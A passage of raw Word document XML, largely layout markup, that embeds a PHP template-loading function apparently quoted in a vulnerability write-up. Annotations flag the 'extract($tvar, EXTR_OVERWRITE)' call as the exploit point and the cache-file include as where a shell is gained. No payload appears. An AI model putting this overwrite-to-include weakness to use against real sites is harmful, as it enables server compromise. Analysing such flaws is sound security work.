            <v:rect id="_x0000_s4005" style="position:absolute;left:7296;top:11794;width:603;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4004" style="position:absolute;left:1617;top:12057;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:shape id="_x0000_s4003" type="#_x0000_t75" style="position:absolute;left:1797;top:12090;width:641;height:259">
              <v:imagedata r:id="rId82" o:title=""/>
            </v:shape>
            <v:rect id="_x0000_s4002" style="position:absolute;left:2438;top:12090;width:800;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4001" style="position:absolute;left:1617;top:12383;width:6745;height:506" fillcolor="#f8f8f8" stroked="f"/>
            <v:shape id="_x0000_s4000" type="#_x0000_t75" style="position:absolute;left:1797;top:12446;width:400;height:200">
              <v:imagedata r:id="rId37" o:title=""/>
            </v:shape>
            <v:rect id="_x0000_s3999" style="position:absolute;left:2197;top:12446;width:723;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <w10:wrap anchorx="page" anchory="page"/>
          </v:group>
        </w:pict>
      </w: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3997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ed="f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spacing w:line="338" w:lineRule="auto"/>
                    <w:ind w:left="579" w:right="3499"/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模版名为空</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t xml:space="preserve">. </w:t>
                  </w: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''==$templateFile){</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:tabs>
                      <w:tab w:val="left" w:pos="2847"/>
                    </w:tabs>
                    <w:spacing w:before="42" w:line="391" w:lineRule="auto"/>
                    <w:ind w:left="180" w:right="528" w:firstLine="799"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$templateFile</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:tab/>
                    <w:t xml:space="preserve">= </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:w w:val="95"/>
                    </w:rPr>
                    <w:t>APP_TPL_PATH.'</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:w w:val="95"/>
                    </w:rPr>
                    <w:t>/'.MODULE_NAME.'/'.ACTION_NAME.'.</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:w w:val="95"/>
                    </w:rPr>
                    <w:t>html</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:w w:val="95"/>
                    </w:rPr>
                    <w:t>'</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:ind w:left="180"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:w w:val="99"/>
                    </w:rPr>
                    <w:t>;</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="65"/>
                    <w:ind w:left="579" w:right="50"/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模版名为</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                      <w:color w:val="333333"/>
                      <w:spacing w:val="-77"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>ACTION_NAME</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="112" w:line="391" w:lineRule="auto"/>
                    <w:ind w:left="180" w:right="247" w:firstLine="398"/>
                  </w:pPr>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>}elseif</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>(file_exists(APP_TPL_PATH.'</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>/'.MODULE_NAME.</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> '/'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templateFile.'.html')) {</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:tabs>
                      <w:tab w:val="left" w:pos="2847"/>
                    </w:tabs>
                    <w:spacing w:line="391" w:lineRule="auto"/>
                    <w:ind w:left="180" w:right="528" w:firstLine="799"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$templateFile</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:tab/>
                    <w:t xml:space="preserve">= </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:w w:val="95"/>
                    </w:rPr>
                    <w:t>APP_TPL_PATH.'</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:w w:val="95"/>
                    </w:rPr>
                    <w:t>/'.MODULE_NAME.'</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:w w:val="95"/>
                    </w:rPr>
                    <w:t>/'</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:w w:val="95"/>
                    </w:rPr>
                    <w:t>.$</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:w w:val="95"/>
                    </w:rPr>
                    <w:t>templateFile.'.</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:w w:val="95"/>
                    </w:rPr>
                    <w:t>htm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 </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>l';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23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579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模版是绝对路径</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="112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}elseif</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>(file_exists($templateFile)){</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="62"/>
                    <w:ind w:left="579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color w:val="333333"/>
                    </w:rPr>
                    <w:t>模版不存在</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="112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>throw_</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:w w:val="95"/>
                    </w:rPr>
                    <w:t>exception(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:w w:val="95"/>
                    </w:rPr>
                    <w:t>L('_TEMPLATE_NOT_EXIST_').'['</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:w w:val="95"/>
                    </w:rPr>
                    <w:t>.$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templ </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>ateFile.']');</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:ind w:left="579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62"/>
                    <w:ind w:left="579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模版缓存文件</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:tabs>
                      <w:tab w:val="left" w:pos="2948"/>
                    </w:tabs>
                    <w:spacing w:before="112" w:line="391" w:lineRule="auto"/>
                    <w:ind w:left="180" w:right="528" w:firstLine="398"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$templateCacheFile</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:tab/>
                    <w:t xml:space="preserve">= </w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:w w:val="95"/>
                    </w:rPr>
                    <w:t>C(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:w w:val="95"/>
                    </w:rPr>
                    <w:t>'TMPL_CACHE_PATH').'</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:w w:val="95"/>
                    </w:rPr>
                    <w:t>/'.APP_NAME.'</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:w w:val="95"/>
                    </w:rPr>
                    <w:t>_'.</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:w w:val="95"/>
                    </w:rPr>
                    <w:t>tsmd5(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$templat </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>eFile).'.</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>php</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>';</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:line="215" w:lineRule="exact"/>
                    <w:ind w:left="579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载入模版缓存</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="112" w:line="388" w:lineRule="auto"/>
                    <w:ind w:left="180" w:right="2452" w:firstLine="398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!$ts['_debug'] &amp;&amp; file_exists($templateCacheFile)) {</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:tabs>
                      <w:tab w:val="left" w:pos="2948"/>
                    </w:tabs>
                    <w:spacing w:line="217" w:lineRule="exact"/>
                    <w:ind w:left="579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1==2){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//TODO</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:tab/>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>开发</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="112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extract(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$tvar, EXTR_OVERWRITE); //exploit!</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="126"/>
                    <w:ind w:left="980" w:right="50"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>//var_</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>dump(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$_SESSION);</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="65"/>
                    <w:ind w:left="980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载入模版缓存文件</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="112"/>
                    <w:ind w:left="980" w:right="50"/>
                  </w:pPr>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>include</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> $templateCacheFile; //getshell here!</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="62"/>
                    <w:ind w:left="579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重新编译</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="112"/>
                    <w:ind w:left="579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3880" style="width:337.75pt;height:279.3pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="6755,5586">
            <v:rect id="_x0000_s3996" style="position:absolute;left:5;top:5;width:6745;height:506" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3995" style="position:absolute;left:185;top:248;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3994" style="position:absolute;left:285;top:248;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3993" style="position:absolute;left:385;top:248;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3992" style="position:absolute;left:485;top:248;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3991" style="position:absolute;left:585;top:248;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3990" style="position:absolute;left:685;top:248;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3989" style="position:absolute;left:785;top:248;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3988" style="position:absolute;left:885;top:248;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3987" style="position:absolute;left:5;top:511;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3986" style="position:absolute;left:185;top:574;width:6266;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3985" style="position:absolute;left:5;top:837;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3984" style="position:absolute;left:185;top:900;width:723;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3983" style="position:absolute;left:5;top:1163;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3982" style="position:absolute;left:185;top:1196;width:100;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3981" style="position:absolute;left:285;top:1196;width:100;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3980" style="position:absolute;left:385;top:1196;width:100;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3979" style="position:absolute;left:485;top:1196;width:100;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3978" style="position:absolute;left:585;top:1196;width:100;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3977" style="position:absolute;left:685;top:1196;width:100;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3976" style="position:absolute;left:785;top:1196;width:100;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3975" style="position:absolute;left:885;top:1196;width:100;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3974" style="position:absolute;left:985;top:1196;width:241;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3973" style="position:absolute;left:1226;top:1196;width:100;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3972" style="position:absolute;left:1326;top:1196;width:800;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3971" style="position:absolute;left:2126;top:1196;width:100;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3970" style="position:absolute;left:2226;top:1196;width:800;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3969" style="position:absolute;left:5;top:1489;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3968" style="position:absolute;left:185;top:1552;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3967" style="position:absolute;left:285;top:1552;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3966" style="position:absolute;left:385;top:1552;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3965" style="position:absolute;left:485;top:1552;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3964" style="position:absolute;left:585;top:1552;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3963" style="position:absolute;left:685;top:1552;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3962" style="position:absolute;left:785;top:1552;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3961" style="position:absolute;left:885;top:1552;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3960" style="position:absolute;left:985;top:1552;width:5302;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3959" style="position:absolute;left:5;top:1815;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3958" style="position:absolute;left:185;top:1878;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3957" style="position:absolute;left:285;top:1878;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3956" style="position:absolute;left:385;top:1878;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3955" style="position:absolute;left:485;top:1878;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3954" style="position:absolute;left:585;top:1878;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3953" style="position:absolute;left:685;top:1878;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3952" style="position:absolute;left:785;top:1878;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3951" style="position:absolute;left:885;top:1878;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3950" style="position:absolute;left:985;top:1878;width:5061;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3949" style="position:absolute;left:5;top:2141;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3948" style="position:absolute;left:185;top:2204;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3947" style="position:absolute;left:285;top:2204;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3946" style="position:absolute;left:385;top:2204;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3945" style="position:absolute;left:485;top:2204;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3944" style="position:absolute;left:585;top:2204;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3943" style="position:absolute;left:685;top:2204;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3942" style="position:absolute;left:785;top:2204;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3941" style="position:absolute;left:885;top:2204;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3940" style="position:absolute;left:5;top:2467;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3939" style="position:absolute;left:185;top:2530;width:6145;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3938" style="position:absolute;left:5;top:2793;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3937" style="position:absolute;left:185;top:2856;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3936" style="position:absolute;left:285;top:2856;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3935" style="position:absolute;left:385;top:2856;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3934" style="position:absolute;left:485;top:2856;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3933" style="position:absolute;left:585;top:2856;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3932" style="position:absolute;left:685;top:2856;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3931" style="position:absolute;left:785;top:2856;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3930" style="position:absolute;left:885;top:2856;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3929" style="position:absolute;left:985;top:2856;width:482;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3928" style="position:absolute;left:1467;top:2856;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3927" style="position:absolute;left:1567;top:2856;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3926" style="position:absolute;left:1667;top:2856;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3925" style="position:absolute;left:1767;top:2856;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3924" style="position:absolute;left:1867;top:2856;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3923" style="position:absolute;left:1987;top:2856;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3922" style="position:absolute;left:2087;top:2856;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3921" style="position:absolute;left:2187;top:2856;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3920" style="position:absolute;left:2287;top:2856;width:2892;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3919" style="position:absolute;left:5;top:3119;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3918" style="position:absolute;left:185;top:3152;width:100;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3917" style="position:absolute;left:285;top:3152;width:100;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3916" style="position:absolute;left:385;top:3152;width:100;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3915" style="position:absolute;left:485;top:3152;width:100;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3914" style="position:absolute;left:585;top:3152;width:100;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3913" style="position:absolute;left:685;top:3152;width:100;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3912" style="position:absolute;left:785;top:3152;width:100;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3911" style="position:absolute;left:885;top:3152;width:100;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3910" style="position:absolute;left:985;top:3152;width:241;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3909" style="position:absolute;left:1226;top:3152;width:100;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3908" style="position:absolute;left:1326;top:3152;width:1800;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3907" style="position:absolute;left:5;top:3445;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3906" style="position:absolute;left:185;top:3508;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3905" style="position:absolute;left:285;top:3508;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3904" style="position:absolute;left:385;top:3508;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3903" style="position:absolute;left:485;top:3508;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3902" style="position:absolute;left:585;top:3508;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3901" style="position:absolute;left:685;top:3508;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3900" style="position:absolute;left:785;top:3508;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3899" style="position:absolute;left:885;top:3508;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3898" style="position:absolute;left:5;top:3771;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3897" style="position:absolute;left:185;top:3834;width:6145;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3896" style="position:absolute;left:6330;top:3834;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3895" style="position:absolute;left:5;top:4097;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3894" style="position:absolute;left:185;top:4160;width:602;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3893" style="position:absolute;left:5;top:4423;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:shape id="_x0000_s3892" type="#_x0000_t75" style="position:absolute;left:185;top:4486;width:520;height:200">
              <v:imagedata r:id="rId60" o:title=""/>
            </v:shape>
            <v:rect id="_x0000_s3891" style="position:absolute;left:5;top:4749;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3890" style="position:absolute;left:185;top:4812;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3889" style="position:absolute;left:285;top:4812;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3888" style="position:absolute;left:385;top:4812;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3887" style="position:absolute;left:485;top:4812;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3886" style="position:absolute;left:585;top:4812;width:361;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3885" style="position:absolute;left:946;top:4812;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
